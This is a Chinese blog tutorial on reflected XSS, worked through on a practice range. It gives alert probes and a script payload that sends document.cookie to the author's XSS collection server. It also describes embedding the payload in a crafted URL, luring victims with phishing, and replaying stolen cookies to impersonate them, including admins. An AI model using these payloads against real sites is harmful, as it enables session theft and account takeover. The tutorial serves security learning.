Web渗透测试之XSS攻击:反射型XSS

最新推荐文章于 2024-06-26 08:20:28 发布
最新推荐文章于 2024-06-26 08:20:28 发布
阅读量2.9k 收藏 14
点赞数 3
分类专栏: XSS 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vodkaDL/article/details/111431893
版权

文章目录

前言

  在上一篇文章中我们基本了解了XSS的类型和危害,在本篇中我们将通过具体的例子和讲解,深入理解反射型XSS攻击的具体过程及危害。

反射型XSS

  在上一篇中我们了解到反射型XSS往往存在于需要通过get获得参数的地方,并且是被立即包含在当前响应的HTTP请求中的。接下来我们就来看看一个最简单的反射型XSS例子。

最简单的反射型XSS

靶场题目页面如下:
题目页面
接着在搜索栏输入一个最简单反射型XSS:< script >alert(1)< /script >,观察页面响应情况:
输入最简单的反射型XSS
结果如下:
反射型XSS结果
可以看到页面出现一个弹窗且弹框内容显示为1。接着再来看看我们写入这个XSS后浏览器地址栏情况:
浏览器地址栏情况
重点在于划红线部分:我们写入的XSS被立即包含在接下来的HTTP请求中。
  由这个简单例子我们就能看出来,反射型XSS攻击的基本流程为:
1.在需要提交get参数且存在XSS漏洞的地方写入我们的脚本,构成http://xxx/xx?abc=XSS这种形式的虚假URL;
2.接着通过点击或者提交等方式触发我们写入的XSS;
3.最后XSS在浏览器中被执行;
在清楚了反射型XSS工作的原理后,我们再来看看反射型XSS的具体用途。

利用反射型XSS获得cookie

  之前我们提到过,XSS最主要的危害就是可以让攻击者冒充受害用户,但我们难以直接获得受害用户的账号密码,因此我们把目标放在存有登录验证用的cookie上。

获得cookie的最简单的方法

  我们在存有XSS漏洞的搜索栏中输入< script>alert(document.cookie)< /script>:
获得cookie
提交后结果如下:
弹出cookie
可以看到,弹窗已经把cookie展示了出来。
  但现在存在的问题是,如果采用此方法,cookie只会在受害用户的浏览器中弹出,最终我们是无法获得cookie的。联想到SQL盲注,同样是无“回显”,而当时我们的采用的方式是将受我们控制的域名一同写进SQL语句中,然后通过查看服务器访问日志来获得我们想要数据。同样地,在反射型XSS中,我们也可以在XSS中写入受我们控制的域名,然后通过查看该域名服务器的请求日志来获得cookie。

DNSlog辅助获得cookie

  我们可以在存在XSS漏洞的地方加上诸如以下XSS:
< script src=“http://127.0.0.1/xss/UYxzH8?1608472710/” + document.cookie;> < /script>(http://127.0.0.1/xss/UYxzH8?1608472710/ 为笔者在本地搭建的XSS平台)
接着构造诸如以下虚假URL诱使受害用户点击:
http://xxx/xx?abc=< script src=“http://127.0.0.1/xss/UYxzH8?1608472710/” + document.cookie;> < /script>
  在用户点击之后只需通过查看日志即可获得受害用户的cookie。在获得cookie之后就可以利用抓包工具修改请求包中的cookie,将其替换为受害用户的cookie即可登录受害用户的账号。而诱使用户点击虚假URL的方式有很多,如钓鱼邮件、特殊的图片或文本等等。涉及社会工程学相关方面的技能说难不难,说容易也不容易,笔者在此不做示范。

总结

  我们可以通过XSS:< script>alert(1)< /script>来简单判断是否存在XSS漏洞。在确定XSS漏洞的类型为反射型之后,可以在XSS中加入受我们控制的域名,使得带有cookie的请求访问我们的服务器。在诱使受害用户点击我们构造的虚假URL之后,我们只需查看DNS请求日志即可获得cookie。最后通过抓包工具修改请求包中的cookie就能达到冒充受害用户的目的,而如果受害者拥有管理员权限,则危害更大,攻击者相当于变相获得了管理员权限。
  以上就是本篇的全部内容,我们下篇见。

VodkaDL
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web安全系列——XSS攻击
Windeal
11-01 885
XSS (Cross-site scripting)攻击,即跨站脚本攻击。攻击者通过在受害者的浏览器中注入恶意代码,攻击受害者的登录凭证、盗取敏感信息或控制受害者的会话等。XSS攻击是很场景的Web应用攻击类反射XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击。攻击负载和脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。
漏洞:反射 XSS 攻击
平凡的人类的博客
03-09 9180
什么是反射 XSS 攻击? 反射 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。反射XSS一般可以由攻击者构造带有恶意代码参数的URL来实现,在构造的URL地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击包含恶意代码参数的链接时才会触发。 实现目的: (其实说白了就类似于 SQL 注入,只不过一个是针对数据库,一个是针对 HTML ) 通过你提交的数据,实现反射 XSS 可以..
网络安全渗透测试零基础入门必知必会】之XSS攻击基本概念和原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了(1)
最新发布
Libra1313的博客
06-26 635
XSS(Cross-Site Scripting,跨站脚本攻击)是一种代码注入攻击。攻击者在目标网站上注入恶意代码,当用户(被攻击者)登录网站时就会执行这些恶意代码,通过这些脚本可以读取cookie,session tokens,或者网站其他敏感的网站信息,对用户进行钓鱼欺诈。XSS玫击原理XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript 编写的恶意代码,也有使用其他客户端脚本语言编写的。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。
XSS-反射
热门推荐
qq_39416206的博客
03-14 1万+
xss反射
跨站脚本攻击(XSS)详解
bluemoon_0的博客
02-04 3137
跨站脚本攻击(XSS)详解
反射 XSS 攻击演示(附链接)
Flag少侠的博客
01-22 2191
反射 XSS 攻击演示(附链接)
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
反射XSS(Cross-site scripting)攻击是一种常见的Web应用程序安全问题,主要利用用户输入的数据未经充分验证或过滤,直接在浏览器中执行,从而对用户的浏览器发起攻击。这种攻击模式的关键在于,恶意脚本不会被...
Web安全之XSS攻击与防御小结
02-23
(1)反射:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS随响应内容一起返回给浏览器,最后浏览器解析执行XSS代码,这个过程就像一次发射,所以叫反射XSS。(2)存储:...
Web应用安全:反射XSS.pptx
06-18
反射XSS,全称为跨站脚本攻击(Cross-Site Scripting),是一种常见的Web应用程序安全漏洞。它涉及到攻击者在Web应用中注入恶意脚本,然后通过诱使用户点击含有这些脚本的特殊URL来执行。由于这种攻击中的恶意代码...
WEB渗透学习-XSS-labs靶场
04-20
1. **反射XSS(Non-Persistent XSS)**:这是最常见的一种XSS,攻击者的恶意脚本通过用户点击链接或者提交表单时的参数传递到服务器,再反射回用户的浏览器。在XSS-labs中,你可以通过构造特殊URL来触发这类XSS。 ...
常见漏洞总结(面试必问)
av11566的博客
04-27 2395
SQL注入 SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术。 SQL注入产生原理 对用户输入的参数没有进行严格过滤(如过滤单双引号 尖括号等),就被带到数据库执行,造成了SQL注入 使用了字符串拼接的方式构造SQL语句 文件上传 什么是文件上传漏洞? 凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞。 文件上传的原理 网站Web应用都有一些文件上传功能,比如文档
跨站脚本攻击(XSS)复现与防范、上海交通大学反射与存储xss案例
sGanYu
10-24 7748
目录 xss漏洞介绍 XSS是什么 XSS漏洞原理 反射XSS攻击复现 存储XSS攻击复现 DOMXSS攻击复现 常用的XSS测试语句 关于XSS的防御 xss漏洞介绍 跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS XSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响
XSS攻击
qq_51003021的博客
08-19 758
XSS全称叫做跨站脚本攻击(cross site script)的缩写,因为缩写和CSS重复,所以叫XSSXSS攻击时一个发生在前端的漏洞,是前端开发人员前端开发不严谨导致的漏洞。它的核心就是前端可以解析用户的输入为dom组件,所以用户可以输入一段JavaScript代码来对网站进行一些恶意修改。XSS的危害一般对一些访问量比较大的网站大,因为XSS并不会破坏网站,而是会对网站进行恶意修改,影响网站的用户,从而窃取信息甚至控制用户。
XSS漏洞
zhoutong2323的博客
04-19 1437
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
渗透测试基础-反射XSS原理及实操
weixin_45488495的博客
04-17 9159
渗透测试基础-反射XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
详解XSS漏洞及反射XSS漏洞
MachineGunJoe666
09-16 384
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,将其注入到Web页面中,并在访问该页面的用户浏览器中执行该脚本代码,从而窃取用户敏感信息、篡改页面内容、操纵页面行为等。XSS漏洞一般分为反射XSS、存储XSS和DOM-Based XSS三种类反射XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。
跨站脚本攻击—XSS
FEWY的博客
09-16 1624
XSS 介绍 XSS 是跨站脚本攻击(Cross Site Scripting)的简写,但是从首写字母命名的方式来看,应该取名 CSS,但这样就和层叠样式表(Cascading Style Sheets,CSS)重名了,所以取名为 XSSXSS 攻击,一般是指攻击者通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。 XSS 危害 窃取用户Cooki...
XSS概述及示范用例
NZXHJ的博客
07-24 806
XSS概述及不同情况下示范用例
XSS详解(概念+靶场演示)反射与存储的比较与详细操作
Hala
05-04 1万+
目录 XSS(跨站脚本攻击) 1.XSS简介 1.1什么是XSS? 1.2 XSS攻击的危害包括: 2. 分类 2.1反射 2.2存储 3. 构造XSS脚本 3.1常用HTML标签 3.2常用javascript方法 4.反射(四种安全级别演示) 4.4.1低安全级别 4.4.2 中安全级别 4.4.2 高安全级别 4.4.2 不可能安全级别 5.存储(四种...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值